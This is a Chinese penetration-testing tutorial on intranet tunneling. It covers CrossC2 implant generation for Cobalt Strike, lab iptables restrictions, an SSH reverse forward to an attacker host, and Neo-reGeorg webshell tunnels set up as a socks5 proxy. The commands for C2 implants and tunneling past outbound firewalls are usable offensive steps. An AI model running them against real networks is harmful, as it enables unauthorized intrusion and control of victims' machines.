内网对抗-隧道技术篇&防火墙组策略&HTTP反向&SSH转发&出网穿透&CrossC2&解决方案

知识点:

bash 复制代码
1、C2/C2上线-CrossC2插件-多系统平台支持
2、隧道技术篇-应用层-SSH协议-判断&封装&建立&穿透
3、隧道技术篇-应用层-HTTP协议-判断&封装&建立&穿透

隧道技术主要解决网络通讯问题:遇到防火墙就用隧道技术,如果没有防火墙纯内网就用socks代理。



一、演示案例-C2上线-多平台系统-CrossC2项目&Linux&Mac&IOS&Android

该插件目前支持Linux&Mac上线(IOS&Android暂未支持,未来版本支持)
https://github.com/gloxec/CrossC2

使用参考:
https://gloxec.github.io/CrossC2/zh_cn/

目前版本只支持反向的https和正向的tcp

1、下载对应版本加载器和CNA插件

2、上传加载器文件和本地加载CNA插件


3、修改CNA插件配置路径

4、使用命令或插件绑定HTTPS监听器生成

一、插件绑定HTTPS监听器生成(修改cna配置文件的情况下)


二、命令(未修改cna配置文件的情况下)

插件绑定HTTPS监听器生成木马,就会有条命令,复制这个命令在攻击机终端生成即可




二、演示案例-隧道技术-SSH转发-出站限制&信息收集

bash 复制代码
SSH 隧道搭建内网穿透:(解决目标出站限制做信息收集)
注:windows也可以支持ssh,需要单独安装该服务罢了。
由于CS无SSH协议监听器配置,无法上线cs。

1、环境复现搭建

bash 复制代码
如:模拟Linux为被控机,配置防火墙策略
iptables -F /* 清除所有规则 */
iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
iptables-save > /etc/sysconfig/iptables /*保存配置*/
iptables -L /* 显示iptables列表 */

如:模拟Windows为被控机,配置防火墙策略:SSH 22端口放行

自己的服务器记得开启ssh协议登录:
vi /etc/ssh/sshd_config
PermitRootLogin yes
PasswordAuthentication yes
/etc/init.d/ssh start
/etc/init.d/ssh restart

2、适用场景

内网主机防火墙限制了出网协议,可以利用SSH转发流量实现内网穿透

3、需要条件:(解决目标出站限制)

bash 复制代码
被控主机需支持SSH协议(Windows需要安装支持软件)
将2.22上80端口流量转发到xx.xx上的1234端口(xx.xx就是攻击机)
ssh -CfNg -R 1234:192.168.2.22:80 root@xx.xx.xx.xx

攻击机上:

bash 复制代码
curL http://127.0.0.1:1234

三、演示案例-隧道技术-HTTP反向-出站限制&信息收集&上线

情况1-HTTP隧道搭建内网穿透:(解决目标出站限制做信息收集)

一、项目Neo-reGeorg(把数据封装成http/https隧道)

https://github.com/L-codes/Neo-reGeorg

1、设置密码生成(aspx|ashx|jsp|jspx|php)并上传

bash 复制代码
python neoreg.py generate -k password


2、使用 neoreg.py 连接 WEB 服务器,在本地建立 socks5 代理

bash 复制代码
python3 neoreg.py -k password -u http://xx/tunnel.php


3、Proxifier添加socks5服务器并配置连接规则测试



二、哥斯拉&冰蝎-内网穿透

哥斯拉:HttpProxy


冰蝎:内网穿透




情况2-HTTP隧道搭建上线C2:(解决目标出站限制上线C2)

太多时候遇到目标不出网了,TCP、ICMP、DNS协议均不通,

无法直接与公网的CS/MSF/Sliverd等其他C2服务端建立连接。




使用HTTP隧道上线c2没什么必要,直接用正反向上线就行(正反向能上线,那么http隧道也能上线,正反向不能上线,http隧道也不能上线)

相关推荐
cccyi720 小时前
HTTP 协议详解:从基础到核心特性
网络协议·http·应用层
特种加菲猫1 天前
HTTP协议核心机制解析
网络·网络协议·http
重生之我是Java开发战士1 天前
【Java SE】HTTP与HTTPS通信协议
java·http·https
zt1985q1 天前
外部访问 Python 搭建的 HTTP 服务器
运维·服务器·网络·windows·网络协议·http
熙客1 天前
HTTP Client介绍
网络·网络协议·http
Arva .2 天前
HTTP vs. HTTPS 有什么区别?
http·https
LiuYaoheng2 天前
Git配置SSH Key到GitHub的详细教程
git·ssh·github
西瓜树枝2 天前
前端必读:HTTP 协议核心知识全景图(三)—— 响应头详解
前端·http
IUGEI2 天前
【计算机网络】HTTP/3如何实现可靠传输?
java·网络·后端·网络协议·tcp/ip·计算机网络·http
爱学习的大牛1232 天前
基于 FRP 实现内网穿透的跨网络 HTTP 服务转发方案
网络·网络协议·http